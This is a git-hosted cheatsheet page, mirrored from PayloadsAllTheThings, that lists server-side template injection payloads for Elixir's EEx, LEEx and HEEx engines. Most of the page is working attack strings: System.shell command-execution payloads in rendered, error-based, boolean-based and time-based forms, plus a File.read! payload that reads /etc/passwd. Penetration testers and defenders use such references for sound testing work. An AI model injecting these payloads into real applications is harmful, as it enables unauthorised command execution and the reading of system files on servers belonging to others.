daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

elixir.md (2601B)


      1 ---
      2 title: "Server Side Template Injection - Elixir"
      3 topic: "Server Side Template Injection"
      4 topicSlug: "server-side-template-injection"
      5 sourcePath: "Server Side Template Injection/Elixir.md"
      6 sourceUrl: "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/3ac27901c711/Server%20Side%20Template%20Injection/Elixir.md"
      7 sha: "3ac27901c711"
      8 isReadme: false
      9 ---
     10 
     11 # Server Side Template Injection - Elixir
     12 
     13 > Server-Side Template Injection (SSTI)  is a vulnerability that arises when an attacker can inject malicious code into a server-side template, causing the server to execute arbitrary commands. In Elixir, SSTI can occur when using templating engines like EEx (Embedded Elixir), especially when user input is incorporated into templates without proper sanitization or validation.
     14 
     15 ## Summary
     16 
     17 - [Templating Libraries](#templating-libraries)
     18 - [Universal Payloads](#universal-payloads)
     19 - [EEx](#eex)
     20     - [EEx - Basic injections](#eex---basic-injections)
     21     - [EEx - Retrieve /etc/passwd](#eex---retrieve-etcpasswd)
     22     - [EEx - Remote Command execution](#eex---remote-command-execution)
     23 - [References](#references)
     24 
     25 ## Templating Libraries
     26 
     27 | Template Name | Payload Format |
     28 |---------------|----------------|
     29 | EEx           | `<%= %>`       |
     30 | LEEx          | `<%= %>`       |
     31 | HEEx          | `<%= %>`       |
     32 
     33 ## Universal Payloads
     34 
     35 Generic code injection payloads work for many Elixir-based template engines, such as EEx, LEEx and HEEx.
     36 
     37 By default, only EEx can render templates from string, but it is possible to use LEEx and HEEx as replacement engines for EEx.
     38 
     39 To use these payloads, wrap them in the appropriate tag.
     40 
     41 ```erlang
     42 elem(System.shell("id"), 0) # Rendered RCE
     43 [1, 2][elem(System.shell("id"), 0)] # Error-Based RCE
     44 1/((elem(System.shell("id"), 1) == 0)&&1||0) # Boolean-Based RCE
     45 elem(System.shell("id && sleep 5"), 0) # Time-Based RCE
     46 ```
     47 
     48 ## EEx
     49 
     50 [Official website](https://hexdocs.pm/eex/1.19.5/EEx.html)
     51 > EEx stands for Embedded Elixir.
     52 
     53 ### EEx - Basic injections
     54 
     55 ```erlang
     56 <%= 7 * 7 %>
     57 ```
     58 
     59 ### EEx - Retrieve /etc/passwd
     60 
     61 ```erlang
     62 <%= File.read!("/etc/passwd") %>
     63 ```
     64 
     65 ### EEx - Remote Command execution
     66 
     67 ```erlang
     68 <%= elem(System.shell("id"), 0) %> # Rendered RCE
     69 <%= [1, 2][elem(System.shell("id"), 0)] %> # Error-Based RCE
     70 <%= 1/((elem(System.shell("id"), 1) == 0)&&1||0) %> # Boolean-Based RCE
     71 <%= elem(System.shell("id && sleep 5"), 0) %> # Time-Based RCE
     72 ```
     73 
     74 ## References
     75 
     76 - [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 3, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md)